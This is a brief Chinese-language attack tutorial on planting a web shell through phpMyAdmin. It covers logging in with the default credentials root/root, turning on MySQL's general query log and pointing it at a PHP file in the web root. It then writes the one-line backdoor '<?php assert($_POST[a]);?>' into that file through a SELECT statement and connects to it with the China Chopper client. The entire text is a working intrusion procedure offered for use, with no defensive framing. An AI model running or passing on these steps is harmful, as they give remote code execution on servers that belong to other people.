登录phpmyadmin 后台
默认密码root root
提权的关键点
- 绝对路径
- 开启日志
1.先判断日志是否打开
show global variables like ‘%general%’;
如果没开 执行以下语句
set global general_log = “ON”;
show global variables like ‘%general%’;
2.设置路径
根据情况设置绝对路径
SET global general_log_file=‘C:\phpStudy\PHPTutorial\WWW\infos.php’;
show global variables like ‘%general%’;
3.写shell(写一句话木马)
select ‘<?php assert($_POST[a]);?>’
菜刀连接http://infos.php